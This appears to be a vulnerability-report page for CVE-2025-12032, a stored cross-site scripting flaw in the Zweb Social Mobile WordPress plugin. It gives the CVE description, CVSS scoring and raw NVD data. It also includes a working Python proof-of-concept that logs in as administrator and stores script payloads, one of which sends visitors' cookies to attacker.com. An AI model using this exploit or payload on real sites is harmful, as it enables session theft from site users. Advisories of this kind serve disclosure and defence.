Security Vulnerability Report
中文
CVE-2025-12032 CVSS 4.4 MEDIUM

CVE-2025-12032

Published: 2025-11-25 08:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Zweb Social Mobile – Ứng Dụng Nút Gọi Mobile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘vithanhlam_zsocial_save_messager’, 'vithanhlam_zsocial_save_zalo', 'vithanhlam_zsocial_save_hotline', and 'vithanhlam_zsocial_save_contact' parameters in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Zweb Social Mobile WordPress插件 <= 1.0.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-12032 PoC - Stored XSS in Zweb Social Mobile WordPress Plugin # Target: WordPress site with Zweb Social Mobile plugin <= 1.0.0 # Authentication: Requires administrator-level access TARGET_URL = "http://target-wordpress-site.com" USERNAME = "admin" PASSWORD = "password" # XSS payload - steals admin cookies XSS_PAYLOAD = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>' def exploit_stored_xss(): """ Exploit CVE-2025-12032: Stored XSS via plugin settings parameters Attack vector: POST request to admin-ajax.php or plugin settings endpoint """ session = requests.Session() # Step 1: Login as administrator login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/admin.php?page=zweb-social-mobile" } session.post(login_url, data=login_data) # Step 2: Inject XSS payload via vulnerable parameters # These 4 parameters are vulnerable: vithanhlam_zsocial_save_messager/zalo/hotline/contact exploit_data = { 'action': 'vithanhlam_zsocial_save_settings', 'vithanhlam_zsocial_save_messager': XSS_PAYLOAD, 'vithanhlam_zsocial_save_zalo': XSS_PAYLOAD, 'vithanhlam_zsocial_save_hotline': '<img src=x onerror=alert(document.domain)>', 'vithanhlam_zsocial_save_contact': XSS_PAYLOAD } # Submit payload to plugin's admin interface admin_ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" response = session.post(admin_ajax_url, data=exploit_data) print(f"[*] Payload sent, response status: {response.status_code}") print(f"[*] XSS payload stored in plugin settings") print(f"[*] Any user visiting affected pages will trigger the XSS") if __name__ == "__main__": exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12032", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:47.737", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Zweb Social Mobile – Ứng Dụng Nút Gọi Mobile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘vithanhlam_zsocial_save_messager’, 'vithanhlam_zsocial_save_zalo', 'vithanhlam_zsocial_save_hotline', and 'vithanhlam_zsocial_save_contact' parameters in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wordpress.org/plugins/zweb-social-mobile/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/26d12c52-d08f-4a6c-ba59-0e26dfb33ae5?source=cve", "source": "[email protected]"}]}}